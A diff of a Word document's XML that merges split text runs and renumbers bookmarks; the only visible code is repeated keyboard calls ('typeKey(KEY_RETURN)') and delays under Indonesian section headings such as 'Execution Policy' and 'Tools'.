-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32079,25 +30168,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32131,25 +30202,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32166,25 +30219,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -32237,25 +30272,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32272,25 +30289,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32324,25 +30323,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32359,25 +30340,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -32400,9 +30363,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="91" w:name="_Toc43087610"/>
-      <w:bookmarkStart w:id="92" w:name="_Toc43087904"/>
-      <w:bookmarkStart w:id="93" w:name="_Toc43258881"/>
+      <w:bookmarkStart w:id="106" w:name="_Toc43087610"/>
+      <w:bookmarkStart w:id="107" w:name="_Toc43087904"/>
+      <w:bookmarkStart w:id="108" w:name="_Toc43258881"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -32480,9 +30443,9 @@
         </w:rPr>
         <w:t>Execution Policy</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="91"/>
-      <w:bookmarkEnd w:id="92"/>
-      <w:bookmarkEnd w:id="93"/>
+      <w:bookmarkEnd w:id="106"/>
+      <w:bookmarkEnd w:id="107"/>
+      <w:bookmarkEnd w:id="108"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -32714,25 +30677,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32749,25 +30694,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32801,25 +30728,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -32836,25 +30745,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -32907,25 +30798,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32942,25 +30815,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32994,25 +30849,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33029,25 +30866,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -33070,9 +30889,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="94" w:name="_Toc43087611"/>
-      <w:bookmarkStart w:id="95" w:name="_Toc43087905"/>
-      <w:bookmarkStart w:id="96" w:name="_Toc43258882"/>
+      <w:bookmarkStart w:id="109" w:name="_Toc43087611"/>
+      <w:bookmarkStart w:id="110" w:name="_Toc43087905"/>
+      <w:bookmarkStart w:id="111" w:name="_Toc43258882"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33135,9 +30954,9 @@
         </w:rPr>
         <w:t>Tools</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="94"/>
-      <w:bookmarkEnd w:id="95"/>
-      <w:bookmarkEnd w:id="96"/>
+      <w:bookmarkEnd w:id="109"/>
+      <w:bookmarkEnd w:id="110"/>
+      <w:bookmarkEnd w:id="111"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -33366,25 +31185,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33401,25 +31202,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33453,25 +31236,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33488,25 +31253,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33540,25 +31287,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -33575,25 +31304,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -33646,25 +31357,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33681,25 +31374,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33733,25 +31408,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33768,25 +31425,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33820,25 +31459,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -33855,25 +31476,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -33897,9 +31500,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="97" w:name="_Toc43087612"/>
-      <w:bookmarkStart w:id="98" w:name="_Toc43087906"/>
-      <w:bookmarkStart w:id="99" w:name="_Toc43258883"/>
+      <w:bookmarkStart w:id="112" w:name="_Toc43087612"/>
+      <w:bookmarkStart w:id="113" w:name="_Toc43087906"/>
+      <w:bookmarkStart w:id="114" w:name="_Toc43258883"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33951,7 +31554,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Baris Perintah untuk </w:t>
       </w:r>
-      <w:bookmarkEnd w:id="97"/>
+      <w:bookmarkEnd w:id="112"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -33980,8 +31583,8 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="98"/>
-      <w:bookmarkEnd w:id="99"/>
+      <w:bookmarkEnd w:id="113"/>
+      <w:bookmarkEnd w:id="114"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34135,25 +31738,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -34170,25 +31755,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
